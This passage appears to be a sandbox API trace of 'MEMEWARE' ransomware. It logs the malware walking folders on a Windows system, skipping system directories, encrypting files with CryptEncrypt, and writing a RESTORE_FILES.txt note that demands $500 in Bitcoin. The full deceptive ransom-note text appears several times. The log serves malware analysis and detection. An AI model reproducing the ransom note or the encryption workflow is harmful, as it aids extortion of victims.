outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.922] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0065.923] lstrlenA (lpString="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") returned 684 [0065.923] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0065.924] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.924] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0065.924] CloseHandle (hObject=0xa4) returned 1 [0065.924] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Windows") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files (x86)") returned -1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="$Recycle.bin") returned 1 [0065.924] lstrcmpiW (lpString1="Device Stage", lpString2="System Volume Information") returned -1 [0065.924] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0065.924] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0065.924] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0065.924] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned 43 [0065.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0065.925] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\.") returned 43 [0065.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.925] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 
[0065.925] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\..") returned 44 [0065.925] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.925] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Windows") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Program Files") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="Program Files (x86)") returned -1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="$Recycle.bin") returned 1 [0065.925] lstrcmpiW (lpString1="Device", lpString2="System Volume Information") returned -1 [0065.925] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0065.925] lstrcmpW (lpString1="Device", lpString2=".") returned 1 [0065.925] lstrcmpW (lpString1="Device", lpString2="..") returned 1 [0065.925] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned 50 [0065.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0065.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned 
-1 [0065.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.927] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.927] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\.") returned 50 [0065.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.927] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.927] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.927] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.927] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\..") returned 51 [0065.927] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.928] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Windows") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files (x86)") returned -1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$Recycle.bin") returned 1 [0065.928] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="System Volume Information") returned -1 [0065.928] wnsprintfW 
(in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0065.928] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0065.928] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0065.928] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 89 [0065.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.938] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.938] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.938] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\.") returned 89 [0065.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.938] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.938] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.938] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.938] wnsprintfW 
(in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\..") returned 90 [0065.938] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.938] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.938] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0065.939] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0065.939] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0065.939] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0065.939] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.939] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0065.939] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0065.939] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0065.939] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0065.939] StrStrIW (lpFirst="behavior.xml", lpSrch=".protected") returned 0x0 [0065.939] lstrcmpW (lpString1="behavior.xml", lpString2="RESTORE_FILES.txt") returned -1 [0065.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.941] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Windows") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Program 
Files") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="Program Files (x86)") returned -1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="$Recycle.bin") returned 1 [0065.941] lstrcmpiW (lpString1="device.png", lpString2="System Volume Information") returned -1 [0065.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0065.941] StrStrIW (lpFirst="device.png", lpSrch=".protected") returned 0x0 [0065.941] lstrcmpW (lpString1="device.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.942] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Windows") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files (x86)") returned -1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="$Recycle.bin") returned 1 [0065.942] lstrcmpiW (lpString1="overlay.png", lpString2="System Volume Information") returned -1 [0065.942] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0065.942] StrStrIW (lpFirst="overlay.png", lpSrch=".protected") returned 0x0 [0065.942] lstrcmpW (lpString1="overlay.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.942] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Windows") returned -1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files (x86)") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="$Recycle.bin") returned 1 [0065.942] lstrcmpiW (lpString1="superbar.png", lpString2="System Volume Information") returned -1 [0065.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0065.942] StrStrIW (lpFirst="superbar.png", lpSrch=".protected") returned 0x0 [0065.942] lstrcmpW 
(lpString1="superbar.png", lpString2="RESTORE_FILES.txt") returned 1 [0065.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.942] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.943] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.943] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.944] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt") returned 105 [0065.944] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.947] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.947] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.948] lstrlenA (lpString="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") returned 684 [0065.948] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.948] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.948] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.948] CloseHandle (hObject=0xd4) returned 1 [0065.948] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0065.949] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0065.949] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 89 [0065.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.949] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\.") returned 89 [0065.949] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.949] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.949] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.949] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.949] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\..") returned 90 [0065.949] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.950] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0065.950] lstrcmpiW (lpString1="background.png", 
lpString2="$Recycle.bin") returned 1 [0065.950] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0065.950] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0065.950] StrStrIW (lpFirst="background.png", lpSrch=".protected") returned 0x0 [0065.950] lstrcmpW (lpString1="background.png", lpString2="RESTORE_FILES.txt") returned -1 [0065.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.950] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.950] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0065.950] lstrcmpiW (lpString1="behavior.xml", 